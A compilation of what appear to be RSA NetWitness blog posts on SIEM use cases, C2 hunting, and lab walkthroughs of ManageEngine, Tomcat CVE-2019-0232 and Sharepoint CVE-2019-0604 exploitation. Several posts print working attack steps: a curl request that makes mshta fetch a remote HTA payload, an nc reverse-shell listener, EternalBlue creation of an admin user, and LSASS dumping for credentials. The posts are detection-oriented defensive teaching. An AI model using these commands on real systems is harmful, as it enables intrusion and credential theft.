  3.       Identify Data Requirements. Identify the packet and/or log sources that are required as inputs to the Use Case and check their availability in the production environment.


  4.       Check Live or Internal Library. Based on the high-level logic developed, always look for similar existing Use Cases available in the Live resource, community platforms, or your own internal Use Case library, instead of developing them from scratch. This helps minimise development effort and at the same time reduces the chance of human error.


  5.     Development. Proceed to develop the Use Case in syntax form, either by modifying existing references or by developing it from scratch if there are no other alternatives.


  6.     Test & Deploy. Deploy the Use Case in a test or staging environment where possible, and simulate the threat scenario which the Use Case is intended to detect to confirm that it is functioning correctly, before proceeding to deploy it in the production environment. Note that there is also an option in NetWitness to deploy the Use Case as a Trial Rule.


  7.       Monitor False Positive & False Negative Rates. Once the rule has been successfully deployed into the SIEM, set up the necessary metrics to monitor the False Positive and False Negative rates.
  •  A high False Positive rate is likely to take a toll on the SOC operations in the long run, as unnecessary human resources and efforts would be spent on triaging all the false positives.


  •  Do note that while False Positives can be determined following triage, it is much more challenging to obtain an accurate picture of the False Negative rate, as this is only possible when you happen to learn of an actual breach where the relevant Use Case failed to trigger in your environment, i.e. you do not know what you do not know. In many instances, breaches can go undetected for a prolonged period of time, making the False Negative rate an extremely difficult metric to measure. Therefore, it is important to properly test the Use Case where possible, following initial deployment.


  8.      Finetune. Should you stop yourself from deploying a particular Use Case for fear of introducing a potentially high False Positive rate? We all know that high False Positive rates are one of an analyst's nightmares; however, this alone should not stop us from deploying a Use Case into the environment, because the Use Case exists in the first place to address the “problem” defined in your Problem Statement. Rather, we should deploy, monitor and finetune the Use Case to reduce the False Positive rate over time. We have to caution that this is not a one-time process and may require several iterations of review and finetuning to eventually stabilise the False Positive rate at an acceptable level.


  9.      Regular Review. As the threat landscape evolves constantly, we should put in place a process to conduct regular reviews of the existing Use Cases, and finetune or even retire those that are no longer relevant, in order to maintain the overall detection efficiency of the SIEM.
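As a minimal illustration of the False Positive metric mentioned in the lifecycle above (the triage counts below are invented for the example):

```python
def false_positive_rate(true_positives: int, false_positives: int) -> float:
    """Fraction of triaged alerts that turned out to be benign."""
    total_alerts = true_positives + false_positives
    if total_alerts == 0:
        return 0.0
    return false_positives / total_alerts

# Example: 120 alerts fired in a month, 90 were benign after triage.
rate = false_positive_rate(true_positives=30, false_positives=90)
print(f"FP rate: {rate:.0%}")  # FP rate: 75%
```

Tracking this number per Use Case over time makes the finetuning iterations measurable rather than anecdotal.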



Now that the Use Case has been deployed into the environment, what is the next step? While the monitoring and detection part of the cycle has been taken care of, it is equally important to also ensure that we have a robust incident response mechanism in place. Apart from the Incident Response Framework which spells out the high-level response process, it is recommended to go into the second order of details to put in place the relevant Playbooks, which are step-by-step response procedures with tasks tagged to individual SOC roles and specific to different threat scenarios. As a good practice, such Playbooks should also be tagged to the relevant Use Cases that are deployed in your SOC. The following diagram summarises how we can make use of the playbooks during the Incident Response cycle depending on the maturity level of the SOC:


  1.       Printed Procedures. This is the least mature method to operate the Playbooks and is generally not recommended unless there are no other suitable alternatives.


  2.      Shared Spreadsheet. This is suitable for small-scale or newly set-up SOCs which are not ready to invest in a SIRP or SOAR yet. For each new case, the relevant playbook template can be pulled out, populated in an Excel spreadsheet (or equivalent) and deposited into a shared drive available to all SOC members, where analysts can update the incident response actions they have taken while the SOC Manager, Incident Handler or Analyst Team Lead tracks the status of open cases through these spreadsheets.


  3.     SIRP. This is essentially an Incident Management Platform which allows analysts to easily apply the relevant playbooks and update the status of incidents in a centralised platform. Compared to the spreadsheet method, a SIRP allows for stricter access control, in terms of being able to define and enforce different levels of permissions across different roles in the platform, as well as the ability to maintain an audit trail.


  4.      SOAR. This orchestrator provides a greater degree of automation in the incident response compared to a SIRP, which can potentially cut down the response time and increase the overall efficiency of the analysts.



To conclude, there is no one-size-fits-all solution when it comes to developing the Use Cases in your organisation, and one recommended approach is to define a short-to-medium term roadmap for Use Case development customised to your environment. The roadmap should also be reviewed and revised from time to time to ensure that it stays relevant to the constantly evolving threat landscape. In general, your SOC should have adequate coverage (in terms of monitoring, detection and response) across the different phases of the Cyber Kill Chain as shown below:



We hope that you find this useful in planning the Use Cases to be developed in your organisation. Happy building!

A zero-day RCE (Remote Code Execution) exploit against ManageEngine Desktop Central was recently released by ϻг_ϻε (@steventseeley). A full description of how this works, along with the code, can be found on his website. We thought we would give this a quick run through the lab to see what indicators it leaves behind.


The Attack

Here we simply run the script and pass it two parameters, the target and the command, which in this case uses cmd.exe to execute whoami and write the result to a file named si.txt:


We can then access the output via a browser and see that the command was executed as SYSTEM:


Here we execute ipconfig:


And grab the output:


The Detection in NetWitness Packets

The script sends an HTTP POST to the ManageEngine server as seen below. It targets the MDMLogUploaderServlet over its default port of 8383 to upload a file with attacker-controlled content for the deserialization vulnerability to work. The command to be executed can also be seen in the body of the POST:

By default, the traffic for this exploit is over HTTPS, so you would need SSL interception to see what is shown here.


This is followed by a GET request to the file that was uploaded via the POST for the deserialization to take place, which is what executes the command passed in the first place:


This activity could be detected by using the following logic in an application rule:

((service = 80) && (action = 'post') && (filename = 'mdmloguploader') && (query begins 'udid=')) || ((service = 80) && (action = 'get') && (directory = '/cewolf/'))


The Detection Using NetWitness Endpoint

To detect this RCE in NetWitness Endpoint, we have to look for Java doing something it normally shouldn't, as Java is what ManageEngine uses. It is not uncommon for Java to execute cmd, so the analyst has to look into the commands to understand whether the behaviour is normal or not. From the below we can see java.exe spawning cmd.exe and running reconnaissance type commands, such as whoami and ipconfig, which should stand out as odd:


The following application rule logic could be used to pick up on this activity. Here we are looking for Java being the source of execution, as well as for the string "tomcat" to narrow it down to the Apache Tomcat web servers that act as the backend for the ManageEngine application; the final part identifies fileless scripts or cmd.exe being executed by it:

(filename.src = 'java.exe') && (param.src contains 'tomcat') && (filename.dst begins '[fileless','cmd.exe')

Other Java-based web servers will likely show a similar pattern of behavior when being exploited.
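The intent of the application rule can be sketched as a simple Python predicate over process events. The dictionary field names below are illustrative stand-ins for the NetWitness meta keys, not an actual API:

```python
def matches_java_spawn_rule(event: dict) -> bool:
    """Rough equivalent of the app rule logic: Java running under Tomcat
    spawning cmd.exe or a fileless script."""
    return (
        event.get("filename_src") == "java.exe"
        and "tomcat" in event.get("param_src", "")
        and event.get("filename_dst", "").startswith(("[fileless", "cmd.exe"))
    )

# A process event resembling the exploitation seen above (paths are invented).
suspicious = {
    "filename_src": "java.exe",
    "param_src": r"C:\ManageEngine\DesktopCentral_Server\tomcat\bin",
    "filename_dst": "cmd.exe",
}
print(matches_java_spawn_rule(suspicious))  # True
```

The point of the sketch is the shape of the logic: all three conditions must hold, so ordinary Java activity outside Tomcat, or Tomcat spawning benign children, will not match.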




As an analyst, it is important to stay up to date with the latest security news to understand whether your organisation could potentially be at risk of compromise. Remote code execution vulnerabilities such as the one outlined here can be an easy gateway into your network, and any devices reachable from the internet should be monitored for anomalous behaviour such as this. Applications should always be kept up to date, and patches applied as soon as they become available, to avoid becoming a potential victim.

This post is going to cover a slightly older C2 framework from Silent Break Security called, Throwback C2. As per usual, we will cover the network and endpoint detections for this C2, but we will delve a little deeper into the threat hunting process for NetWitness as well.


The Attack

After installing Throwback and compiling the executable for infection (which in this case we will just drop and execute manually), we shortly see the successful connection back to the Throwback server:


Now that we have our endpoint communicating back with our server, we can execute typical reconnaissance type commands against it, such as whoami:


Or tasklist to get a list of running processes:


This C2 has a somewhat slow beacon that by default is set to ~10 minutes, so we have to wait that amount of time for our commands to be picked up and executed:



Detection Using NetWitness Network

To begin hunting, the analyst needs to prepare a hypothesis of what it is they believe is currently taking place in their network. This process would typically involve the analyst creating multiple hypotheses, and then using NetWitness to prove, or disprove them; for this post, our hypothesis is going to be that there is C2 traffic - these can be as specific or as broad as you like, and if you struggle to create them, the MITRE ATT&CK Matrix can help with inspiration.


Now that we have our hypothesis, we can start to hunt through the data. The below flow is an example of how we do exactly that with HTTP:

  1. What we are looking for defines the direction. In this case, we are looking for C2 communication, which means our direction will be outbound (direction = 'outbound')
  2. Secondly, focus on a single protocol at a time. For our hypothesis, we could start with SSL; if we have no findings, we can move on to another protocol such as HTTP. The idea is to navigate through them one by one, separating the data into smaller, more manageable buckets without getting distracted (service = 80)
  3. Now we want to home in on the characteristics of the protocol and pull it apart. As we are looking for C2 communication, we want to look for more mechanical type behaviour. One meta key that helps with this is Service Analysis; the below figure shows some examples of meta values created based off HTTP


A great place to get more detail on using NetWitness for hunting is the RSA NetWitness Hunting Guide.


From the Investigation view, we can start with our initial query looking for outbound traffic over HTTP, and open the Service Analysis meta key. There are a fair number of meta values generated, and all of them are great places to start pivoting; you can choose to pivot on an individual meta value, or on multiple. We are going to start by pivoting on three, which are outlined below:

  • http six or less headers: Modern day browsers typically have seven or more headers. This could indicate a more mechanical type HTTP connection
  • http single response: Typical user browsing behaviour would result in multiple requests and responses in a single TCP connection. A single request and response can indicate more mechanical type behaviour
  • http post no get no referer: HTTP connections with no referer or GET requests can be indicative of machine like behaviour. Typically the user would have requested one or more pages prior to posting data to the server, and would have been referred from somewhere


After pivoting into the meta values above, we reduce the number of sessions to investigate to a more manageable volume:


Now we can start to open other meta keys and look for values of interest without being overwhelmed by the enormous amount of data. This could involve looking at meta keys such as Filename, Directory, File Type, Hostname Alias, TLD, SLD, etc. Based on the meta values below, the domain de11-rs4[.]com stands out as interesting and something we should take a look at; as an analyst, you should investigate all domains you deem of interest:


Opening the Events view for these sessions, we can see a beacon pattern of ~10 minutes; the filename is the same every time, and the payload size is consistent apart from the initial communication, which could be the download of a second stage module to further entrench. This could also be legitimate traffic: software simply checking in for updates, sending some usage data, etc.:
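The ~10 minute beacon pattern can also be checked programmatically. Below is a rough sketch that flags near-constant inter-arrival times; the timestamps and tolerance are invented for illustration, and real traffic needs more care (jitter, gaps, legitimate update checks):

```python
from statistics import mean, pstdev

def looks_like_beacon(timestamps, tolerance=0.1):
    """Flag near-constant inter-arrival times, a hallmark of C2 check-ins.

    timestamps: session start times in seconds, sorted ascending.
    tolerance: allowed jitter as a fraction of the mean interval.
    """
    deltas = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(deltas) < 3:
        return False  # not enough data points to judge
    return pstdev(deltas) <= tolerance * mean(deltas)

# Sessions roughly every ~600 seconds (10 minutes), as seen above.
times = [0, 601, 1199, 1802, 2400, 3001]
print(looks_like_beacon(times))  # True
```

Normal user browsing produces highly irregular intervals, so a low standard deviation relative to the mean interval is a useful signal to pivot on.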


Reconstructing the events, we can see the body of the POST contains what looks like Base64 encoded data, and in the response we see a 200 OK but with a 404 Not Found message and a hidden attribute which references cmd.exe and whoami:

The Base64 data in the POST is encrypted, so decoding it at this point would not reveal anything useful. We may, however, be able to obtain the key and encryption mechanism if we get hold of the executable; keep reading to see!


Similarly we see another session which is the same but the hidden attribute references tasklist.exe:

The following application rule logic would detect default Throwback C2 communication:
service = 80 && analysis.service = 'http six or less headers' && analysis.service = 'http post no get no referer' && filename = 'index.php' && directory = '/' && query begins 'pd='

This definitely stands out as C2 traffic and would warrant further investigation into the endpoint. This could involve directly analysing all network traffic for this machine, or switching over to NetWitness Endpoint to analyse what it is doing, or both.


NOTE: The network traffic as seen here would be post-proxy, or traffic in a network with no explicit proxy settings.


Detection Using NetWitness Endpoint

As per usual, I start by opening the compromise keys. Under Behaviours of Compromise (BOC), there are multiple meta values of interest, but let's start with outbound from unsigned appdata directory:


Opening the Events view for this meta value, we can see that an executable named dwmss.exe is making a network connection to de11-rs4[.]com:


Coming back to the Investigation view, we can run a query to see what other activity this executable is performing. To do this, we execute the following query: filename.src = 'dwmss.exe'. Here we can see the executable is running reconnaissance type commands:


From here we decide to download the executable directly from the machine itself and perform some analysis on it. In this case, we ran strings and analysed the output and saw there were a large number of references to API calls of interest:


There is also a string that references RC4, which is an encryption algorithm. This could be of potential interest to decrypt the Base64 text we saw in the network traffic:


RC4 requires a key, so while analysing the strings we should also look for potential candidates for said key. Not far from the RC4 string is something that looks like it could be what we are after:


Navigating back to the packets and copying some of the Base64 from one of the POSTs, we can run it through the RC4 recipe on CyberChef with our proposed key; in the output we can see the data decoded successfully and contains information about the infected endpoint:
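The same decryption can be reproduced outside CyberChef with a few lines of Python, since RC4 is simple enough to implement directly. Note that "SECRETKEY" and the sample plaintext below are placeholders, not the actual key or data recovered from the binary:

```python
import base64

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). RC4 is symmetric, so the same function
    both encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # keystream generation XORed with the data
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

# Placeholder key and payload standing in for the recovered ones.
key = b"SECRETKEY"
ciphertext_b64 = base64.b64encode(rc4(key, b"hostname=WIN10-VICTIM")).decode()

# Decrypting what came over the wire: Base64 decode, then RC4 with the key.
print(rc4(key, base64.b64decode(ciphertext_b64)))  # b'hostname=WIN10-VICTIM'
```

The two-step recipe (Base64 decode, then RC4 with the recovered key) mirrors what CyberChef is doing in the screenshot above.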


Now that we have confirmed this is malware, we should go back and look at all the activity generated by this process. This could be any file it has created, files dropped around the same time, folders it may be using, etc.



C2 frameworks are constantly being developed and improved upon, but as you can see from this C2, which is ~6 years old, their operation is fairly consistent with what we see today; and with the way NetWitness allows you to pull apart the characteristics of a protocol, they can easily be identified.

It is possible to add RSA NetWitness as a Search Engine in Chrome, which allows you to run queries directly from the address bar.



The following are the steps to follow in your browser to set this up.


  1. Start by navigating to your NetWitness instance on the device you want to query (typically the broker). Note the highlighted number in the address (this number identifies the device to query and varies from environment to environment).
  2. Right click in the navigation bar and select "Edit search engines..."




  3. Click on "Add" to add a new search engine
  4. Add the information for your NetWitness instance
    • Search Engine: This can be any name of your choice. This is the name that will show in the address bar when selected
    • Keyword: This is the keyword that will be used to trigger NetWitness as the Search Engine to use (initiated by typing the keyword followed by the <tab> key)
    • URL: This should be based on the following structure: https://<netwitness_ip>/investigation/<number from 1st step>/navigate/query/%s
  5. Click on "Add" to add NetWitness as a Search Engine



Now, whenever you click on the address bar and type nw followed by the <tab> key (or whatever keyword you chose in the previous step), you can type your NetWitness query directly in the address bar and hit <enter> to run it against NetWitness.
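What Chrome does with the %s placeholder in the search URL can be sketched in Python; the host name and device number below are placeholders for your own environment:

```python
from urllib.parse import quote

# Placeholders -- substitute your own NetWitness address and the device
# number noted in step 1.
NETWITNESS_HOST = "netwitness.example.local"
DEVICE_ID = 6

def build_query_url(query: str) -> str:
    """Reproduce the %s substitution: the query is percent-encoded and
    appended to the /navigate/query/ path."""
    return (f"https://{NETWITNESS_HOST}/investigation/{DEVICE_ID}"
            f"/navigate/query/{quote(query, safe='')}")

print(build_query_url("service = 80 && direction = 'outbound'"))
```

This is why queries with spaces, quotes and operators work straight from the address bar: the browser percent-encodes them before substituting into the URL template.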




We are excited to share that Dell Technologies (RSA) has been positioned as a “Leader” by Gartner in the 2020 Magic Quadrant for Security Information and Event Management research report for its RSA NetWitness® Platform – for the second year in a row!


The RSA NetWitness Platform pulls together SIEM, network detection and response, endpoint detection and response, UEBA and orchestration and automation capabilities into a single evolved SIEM. RSA’s continued investments in the platform position us as the go-to platform for security teams to rapidly detect and respond to threats across their entire environment.


The 2020 Gartner Magic Quadrant for SIEM evaluates 16 vendors on the basis of the completeness of their vision and ability to execute. The report provides an overview of each vendor’s SIEM offering, along with what Gartner sees as strengths and cautions for each vendor. The report also includes vendor selection tips, guidance on how to define requirements for SIEM deployments, and details on its rigorous inclusion, exclusion and evaluation criteria. 


Download the report and learn more about RSA NetWitness Platform.


Gartner, Magic Quadrant for Security Information and Event Management, Kelly Kavanagh, Toby Bussa, Gorka Sadowski, 18 February 2020

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.


As Leader in Magic Quadrant for Security Information and Event Management 2020

As Leader in Magic Quadrant for Security Information and Event Management 2018


GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and is used herein with permission. All rights reserved

The concept of multi-valued meta keys - those which can appear multiple times within single sessions - is not a new one, but has become more important and relevant in recent releases due to how other parts of the RSA NetWitness Platform handle them.


The most notable of these other parts is the Correlation Server service, previously known as the ESA service.  In order to enable complex, efficient, and accurate event correlation and alerting, it is necessary for us to tell the Correlation Server service exactly which meta keys it should expect to be multi-valued.


Every release notes PDF for each RSA NetWitness Platform version contains instructions for how to update or modify these keys to tune the platform to your organization's environment. But the question I have each time I read these instructions is this: How do I identify ALL the multi-valued keys in my RSA NetWitness Platform instance?


After all, my lab environment is a fraction of the size of any organization's production environment, and if it's an impossible task for me to manually identify all, or even most, of these keys, then it's downright laughable to expect any organization to even attempt to do the same.


Enter: automation and scripting to the rescue!



The script attached to this blog attempts to meet that need.  I want to stress "attempts to" here for 2 reasons:

  1. Not every metakey identified by this script necessarily should be added to the Correlation Server's multi-valued configuration. This will depend on your environment and any tuning or customizations you've made to parsers, feeds, and/or app rules.
    1. For example, this script identified 'user.dst' in my environment.
    2. However, I don't want that key to be multi-valued, so I'm not going to add it.
    3. Which leaves me with the choice of leaving it as-is, or undoing the parser, feed, and/or app rule change I made that caused it to happen.
  2. In order to be as complete in our identification of multi-valued metas as we can, we need a large enough sample size of sessions and metas to be representative of most, if not all, of an organization's data.  And that means we need sample sizes in the hundreds-of-thousands to millions range.


But therein lies the rub.  Processing data at that scale requires us to first query the RSA NetWitness Platform databases for all that data, pull it back, and then process it, all without flooding the RSA NetWitness Platform with thousands or millions of queries (after all, the analysts still need to do their responding and hunting), without consuming so many resources that the script freezes or crashes the system, and while still producing an accurate result, because otherwise what's the point?


I made a number of changes to the initial version of this script in order to limit its potential impact.  The result of these changes was that the script will process batches of sessions and their metas in chunks of 10000.  In my lab environment, my testing with this batch size resulted in roughly 60 seconds between each process iteration.


The overall workflow within the script is:

  1. Query the RSA NetWitness Platform for a time range and grab all the resulting sessionids.
  2. Query the RSA NetWitness Platform for 10000 sessions and all their metas at a time.
  3. Receive the results of the query.
  4. Process all the metas to identify those that are multi-valued.
  5. Store the result of #3 for later.
  6. Repeat steps 2-5 until all sessions within the time range have been processed.
  7. Evaluate and deduplicate all the metas from #4/5 (our end result).
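The core of steps 2 through 4 can be sketched in Python. The actual SDK query is mocked out with in-memory data here, and the (sessionid, metas) tuple shape is an illustrative assumption, not the real API:

```python
from itertools import islice

def batched(session_ids, size):
    """Yield session ids in fixed-size chunks (step 2 of the workflow)."""
    it = iter(session_ids)
    while chunk := list(islice(it, size)):
        yield chunk

def find_multivalued_keys(sessions):
    """Return meta keys that occur more than once within any single session.

    `sessions` is an iterable of (sessionid, [(key, value), ...]) pairs,
    standing in for the results a real SDK query would return.
    """
    multivalued = set()
    for _sid, metas in sessions:
        seen = set()
        for key, _value in metas:
            if key in seen:
                multivalued.add(key)
            seen.add(key)
    return multivalued

# Mocked query results: session 2 carries two user.dst values.
results = [
    (1, [("ip.src", ""), ("user.dst", "alice")]),
    (2, [("user.dst", "bob"), ("user.dst", "svc_backup"), ("action", "login")]),
]
print(sorted(find_multivalued_keys(results)))  # ['user.dst']
```

Running this per 10000-session batch and unioning the result sets across batches is effectively steps 5 through 7: store each batch's findings, then deduplicate at the end.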


This is the best middle ground I could find among the various factors.

  • A 10000 session batch size will still result in potentially hundreds or thousands of queries to your RSA NetWitness Platform environment
    • The actual time your RSA NetWitness Platform service (Broker or Concentrator) spends responding to each of these should be no more than ~10-15 seconds each.
  • The time required for the script to process each batch of results will end up spacing out each new batch request to about 60 seconds in between.
    • I saw this time drop to as low as 30 seconds during periods of minimal overall activity and utilization on my admin server.
  • The max memory I saw the script utilize in my lab never exceeded 2500MB.
  • The max CPU I saw the script utilize in my lab was 100% of a single CPU.
  • The absolute maximum number of sessions the script will ever process in a single run is 1,677,721. This is a hardcoded limit in the RSA NetWitness SDK API, and I'm not inclined to try and work around that.


The output of the script is formatted so you can copy/paste directly from the terminal into the Correlation Server's multi-valued configuration.  Now with all that out of the way, some usage screenshots:





Any comments, questions, concerns or issues with the script, please don't hesitate to comment or reach out.

What are LotL tactics?

Living-Off-The-Land tactics are those that involve the use of legitimate tools for malicious purposes. This is an old concept, but a recent growing trend among threat actors, because these techniques are very difficult to detect considering that the tools used are whitelisted most of the time. A good list of applications that can be used for this type of tactic can be found at LOLBAS (Windows) and GTFOBins (UNIX).



The first part of this article will show how an attacker is able to spot and exploit a recent RCE (Remote Code Execution) vulnerability in Apache Tomcat. We will see how the attacker is eventually able to get a reverse shell using the legitimate Windows utility mshta.exe. The second part will focus on the detection phase, leveraging the RSA NetWitness Platform.



The attacker has targeted an organization we will call examplecorp throughout this blog post. During the enumeration phase, thanks to resources such as Google dorks and nmap, the attacker has discovered that the company runs a Tomcat server which is exposed to the Internet. Upon further research, the attacker finds a vulnerability and successfully exploits it in order to obtain a reverse shell, which will serve as the foundation for his malicious campaign against examplecorp.


To achieve what has been described in the above scenario the attacker uses different tools and services:


The scenario is simulated on a virtual local environment. Below is a list of the IP addresses used:

  •  --> attacker machine (Kali Linux)
  •    --> victim/examplecorp machine  (Windows host where Tomcat is running)
  •  --> remote server where the attacker stored the malicious payload (shell.hta)


Part 1 - Attack phase

With enumeration tools such as nmap, gobuster, etc., the attacker discovers that the Tomcat server is on version 9.0.17, it is running on Windows and it serves a legacy application through a CGI Servlet at the following address:


Hello World!

In our example the application is as simple as "Hello, World!", but in reality it would be something else.


Upon further research the attacker discovers a vulnerability (CVE-2019-0232) in the CGI Servlet component of Tomcat prior to version 9.0.18. A detailed description of the vulnerability can be found at the following links:


With a simple test the attacker can verify the vulnerability. Just by adding ?&dir at the end of the URL, the attacker can see the output of the dir command on the affected Windows server Tomcat is running on.

root@kali:~# curl ""
Hello, World!
Volume in drive C has no label.
Volume Serial Number is 4033-77BA

Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi

19/12/2019  13:27    <DIR>          .
19/12/2019  13:27    <DIR>          ..
17/12/2019  15:00    <DIR>          %SystemDrive%
16/12/2019  21:37                67 app.bat
19/12/2019  13:19                21
               2 File(s)             88 bytes
               3 Dir(s)  39,850,405,888 bytes free


Now the attacker decides to create a malicious payload that will spawn a remote shell. To do that, he uses a tool dubbed WeirdHTA that allows him to create an obfuscated remote shell in hta format, which he can then invoke remotely using the Microsoft mshta utility. The attacker tests the file against the most common antivirus software to ensure it is properly obfuscated and not detected, before initiating the attack.



The attacker launches the below command to connect to the remote server and run the malicious payload:

root@kali:~# curl -v ""
*   Trying
* Connected to ( port 8080 (#0)
> GET /cgi/app.bat?&C%3A%2FWindows%2FSystem32%2Fmshta.exe+http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta HTTP/1.1
> Host:
> User-Agent: curl/7.66.0
> Accept: */*
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Content-Type: text/plain
< Content-Length: 15
< Date: Fri, 31 Jan 2020 10:44:16 GMT
Hello, World!
* Connection #0 to host left intact


If we break this command down we can see the following:

  1. curl -v "
      The above is the URL of the Tomcat server where the CGI Servlet app (app.bat) resides
  2. ?&C%3A%2FWindows%2FSystem32%2Fmshta.exe+
      The second part is a URL-encoded string that decodes to C:\Windows\System32\mshta.exe
  3. http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta"
    This last part is the URL-encoded address of the remote location where the attacker keeps the malicious payload, that is shell.hta.
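The decoding described in parts 2 and 3 can be reproduced with Python's standard library:

```python
from urllib.parse import unquote

encoded = "?&C%3A%2FWindows%2FSystem32%2Fmshta.exe+http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta"

# Strip the query prefix, split on '+' (the CGI argument separator used
# here), and percent-decode each part.
parts = [unquote(p) for p in encoded.lstrip("?&").split("+")]
print(parts[0])  # C:/Windows/System32/mshta.exe
print(parts[1])  # http://192.168.16.146:8000/shell.hta
```

This is exactly the two-part payload the server receives: the full path to mshta.exe, plus the URL of the remote shell.hta it should fetch and run.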


The attacker, who had created a listener on his remote server, obtains the shell:

root@kali:~# nc -lvnp 7777
listening on [any] 7777 ...
connect to [] from (UNKNOWN) [] 50057
Client Connected...

PS C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi> dir

    Directory: C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi

Mode                LastWriteTime         Length Name                                                                 
----                -------------         ------ ----                                                                 
d-----       17/12/2019     15:00                %SystemDrive%                                                        
-a----       16/12/2019     21:37             67 app.bat                                                              
-a----       19/12/2019     13:19             21                                                             

PS C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi>


Part 2 - Detection phase with the RSA NetWitness Platform

While investigating with RSA NetWitness Endpoint the analyst notices the Behaviors of Compromise meta key populated with the value runs mshta with http argument, which is unusual.



Filtering by the runs mshta with http argument indicator, the analyst observes that an application running on Tomcat is launching mshta, which in turn is calling an hta file residing on a remote server.



Drilling into these sessions using the event analysis panel, the analyst is able to confirm the events in more detail:

  1.       app.bat running on the machine with hostname winEP1
  2. created the process
  3. called mshta.exe
  4. mshta.exe runs with the parameter


The analyst, knowing the affected machine IP address, decides to dig deeper with the RSA NetWitness Platform using the network (i.e. packet) data.


  1.       Investigating around the affected machine's IP in the same time range, the analyst notices the attacker's IP address connecting to Tomcat on port 8080 (to test whether the server is vulnerable to CVE-2019-0232) by adding the dir command to the URL. He can also see the response.

  2. Immediately after the first event, the analyst notices the same IP address connecting on the same port but this time using a more complex GET request which seems to allude to malicious behavior.

  3. Now the analyst filters by ip.dst= (the IP address found in the GET request above) and is able to see the content of the shell.hta file. Although it is encoded and not human-readable, it is extremely suspicious!

  4. Next, the analyst filters by ip.dst= and eventually sees that the attacker has obtained shell access (through PowerShell) to the Windows machine where Tomcat resides.
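The vulnerability test observed in step 1 can be sketched in a few lines. The target address and CGI path below are hypothetical stand-ins (the actual URL mapping depends on the Tomcat CGI servlet configuration), but the injection shape is characteristic of CVE-2019-0232: the OS command simply rides in the query string appended to the batch file's URL.

```python
from urllib.parse import quote

# Hypothetical target and CGI path; app.bat matches the directory
# listing shown earlier, but the real mapping depends on web.xml.
target = "http://10.0.0.5:8080"
cgi_path = "/cgi/app.bat"
injected = "dir"  # the command the attacker appends to probe the server

# CVE-2019-0232: on Windows, Tomcat's CGI servlet passes the decoded
# query string to the batch file, so '?&dir' causes dir to execute.
url = f"{target}{cgi_path}?&{quote(injected)}"
print(url)
```

Hunting for this pattern in proxy or packet data (a command name directly after `?&` in a request to a .bat or .cmd CGI resource) is a simple way to spot probing attempts.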



LotL tactics are very effective and difficult to detect due to the legitimate nature of the tools used to perform such attacks. Constant monitoring and proactive threat hunting are vital for any organization. The RSA NetWitness Platform provides analysts with the visibility needed to detect such activities, thus reducing the risk of being compromised.

In this post we will cover CVE-2019-0604 (, a somewhat older vulnerability that is still being exploited. This post will also go a little further than just the initial exploitation of the Sharepoint server, and use EternalBlue to create a user on a remote endpoint to allow lateral movement with PAExec; again, this is an old, well-known vulnerability, but something still being used. We will then utilise Dumpert to dump the memory of LSASS ( and obtain credentials, and then employ atexec from Impacket ( to move laterally further.


The Attack

The initial foothold on the network is obtained via the Sharepoint vulnerability (CVE-2019-0604). We will use the PoC code developed by Voulnet ( to drop a web shell:


In the above command we are targeting the vulnerable Picker.aspx page, and using cmd to echo a Base64 encoded web shell to a file in C:\ProgramData\ - we then use certutil to Base64 decode the file into a publicly accessible directory on the Sharepoint server and name it bitreview.aspx.
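Because the echoed payload is plain Base64, a defender who recovers that command from logs or packet data can reproduce the certutil -decode step offline. A minimal sketch, using a short stand-in blob rather than the real web shell source:

```python
import base64

# Stand-in for the Base64 blob echoed into C:\ProgramData\ (a real
# capture would hold the full ASPX web shell source).
captured_b64 = base64.b64encode(b'<%@ Page Language="JScript" %>').decode()

# certutil -decode performs a plain Base64 decode, so the same
# transformation recovers the contents of the dropped bitreview.aspx.
recovered = base64.b64decode(captured_b64).decode()
print(recovered)
```

This quickly confirms whether the echoed blob is a web shell or some other staged tooling.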


To access the web shell we just dropped onto the Sharepoint server, we are going to use the administrative tool, AntSword ( Here we add the URL to the web shell we dropped, and supply the associated password:


Now we can open a terminal and begin to execute commands on the server to get a lay of the land and find other endpoints to laterally move to:


The AntSword tool has a nice explorer view which allows us to easily upload additional tools to the server. In this instance we upload a scanner to check if an endpoint is vulnerable to EternalBlue:


Now we can iterate through some of the endpoints we uncovered earlier to see if any of them are vulnerable to EternalBlue:


Now that we have uncovered a vulnerable endpoint, we can use this to create a user that will allow us to laterally move to it. Using the PoC code created by Worawit (, we can exploit the endpoint and execute custom shellcode of our choosing. For this I compiled some shellcode to create a local administrative user called helpdesk. I uploaded my shellcode and EternalBlue exploit executable and ran it against the vulnerable machine:


Now that we have created a local administrative user on the endpoint, we can laterally move to it using those credentials. In this instance, we upload PAExec and Dumpert, so we can laterally move to the endpoint and dump the memory of LSASS. The following command copies and executes Outflank-Dumpert.exe using PAExec and the helpdesk user we created via EternalBlue:


This tool will locally dump the memory of LSASS to C:\Windows\Temp - so we will mount one of the administrative shares on the endpoint, and confirm if our dump was successful:


Using AntSword's explorer, we can easily navigate to the file and download it locally:


We can then use Mimikatz on the attacker's local machine to dump the credentials, which may help us laterally move to other endpoints:


We decide to upload the atexec tool from Impacket to execute commands on the remote endpoint to see if there are other machines we can laterally move to. Using some reconnaissance commands, we find an RDP session using the username we pulled from the LSASS dump:


